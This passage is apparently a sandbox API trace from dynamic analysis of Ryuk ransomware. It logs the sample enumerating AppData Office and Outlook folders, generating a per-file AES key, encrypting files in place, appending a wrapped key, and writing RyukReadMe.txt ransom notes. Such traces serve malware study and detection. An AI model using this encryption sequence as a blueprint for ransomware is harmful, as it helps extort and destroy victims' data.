lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.009] CloseHandle (hObject=0x194) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.010] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.010] SetLastError (dwErrCode=0x0) [0143.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.010] GetLastError () returned 0xb7 [0143.010] CloseHandle (hObject=0x190) returned 1 [0143.010] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.010] SetLastError (dwErrCode=0x0) [0143.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.010] GetLastError () returned 0xb7 [0143.010] CloseHandle (hObject=0x190) returned 1 [0143.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.011] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.011] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.011] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf", dwFileAttributes=0x80) returned 1 [0143.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.011] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=1122) returned 1 [0143.011] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=1122) returned 1 [0143.011] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x340, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.011] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0143.013] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.013] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0143.013] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.013] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.013] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x462, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x462, lpOverlapped=0x0) returned 1 [0143.013] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0143.013] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x462, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x470) returned 1 [0143.013] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.013] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x470, lpOverlapped=0x0) returned 1 [0143.013] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0143.013] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.013] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.013] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0143.013] CloseHandle (hObject=0x194) returned 1 [0143.030] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.034] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.034] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.034] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.034] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.034] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi", dwFileAttributes=0x80) returned 1 [0143.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.035] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=185) returned 1 [0143.035] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=185) returned 1 [0143.035] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0143.035] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.035] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.035] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xb9, lpOverlapped=0x0) returned 1 [0143.036] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0143.036] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xb9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xc0) returned 1 [0143.036] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.036] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xc0, lpOverlapped=0x0) returned 1 [0143.036] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0143.036] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.036] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.036] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0143.036] CloseHandle (hObject=0x194) returned 1 [0143.053] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.057] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.057] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.057] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.057] SetLastError (dwErrCode=0x0) [0143.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.059] GetLastError () returned 0x0 [0143.059] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.060] CloseHandle (hObject=0x194) returned 1 [0143.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0143.060] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.061] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.061] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", dwFileAttributes=0x80) returned 1 [0143.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.061] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=260) returned 1 [0143.061] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=260) returned 1 [0143.061] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0143.061] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.061] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.062] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x104, lpOverlapped=0x0) returned 1 [0143.062] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0143.062] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x104, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x110) returned 1 [0143.062] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.062] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x110, lpOverlapped=0x0) returned 1 [0143.063] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0143.063] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.063] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.063] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0143.063] CloseHandle (hObject=0x198) returned 1 [0143.089] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.093] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.093] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.093] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0143.094] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0143.094] SetLastError (dwErrCode=0x0) [0143.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.094] GetLastError () returned 0x0 [0143.094] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.095] CloseHandle (hObject=0x194) returned 1 [0143.095] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.095] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.095] SetLastError (dwErrCode=0x0) [0143.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.095] GetLastError () returned 0xb7 [0143.095] CloseHandle (hObject=0x190) returned 1 [0143.095] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.095] SetLastError (dwErrCode=0x0) [0143.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.095] GetLastError () returned 0xb7 [0143.096] CloseHandle (hObject=0x190) returned 1 [0143.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.097] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.097] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.097] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.097] SetLastError (dwErrCode=0x0) [0143.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\publisher\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.098] GetLastError () returned 0x0 [0143.098] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.101] CloseHandle (hObject=0x190) returned 1 [0143.101] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.101] SetLastError (dwErrCode=0x0) [0143.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.101] GetLastError () returned 0xb7 [0143.101] CloseHandle (hObject=0x190) returned 1 [0143.101] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.102] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.102] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.102] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.102] SetLastError (dwErrCode=0x0) [0143.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\taskschedulerconfig\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.103] GetLastError () returned 0x0 [0143.103] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.104] CloseHandle (hObject=0x190) returned 1 [0143.104] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.104] SetLastError (dwErrCode=0x0) [0143.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.104] GetLastError () returned 0xb7 [0143.104] CloseHandle (hObject=0x190) returned 1 [0143.104] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.104] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.104] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.104] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.105] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat", dwFileAttributes=0x80) returned 1 [0143.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.105] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=101600) returned 1 [0143.105] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=101600) returned 1 [0143.105] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x18bbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.105] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0143.106] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.106] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0143.106] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.107] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.107] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18ce0, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x18ce0, lpOverlapped=0x0) returned 1 [0143.109] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0143.109] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x18ce0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x18cf0) returned 1 [0143.109] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.109] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18cf0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x18cf0, lpOverlapped=0x0) returned 1 [0143.110] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0143.110] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.110] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, 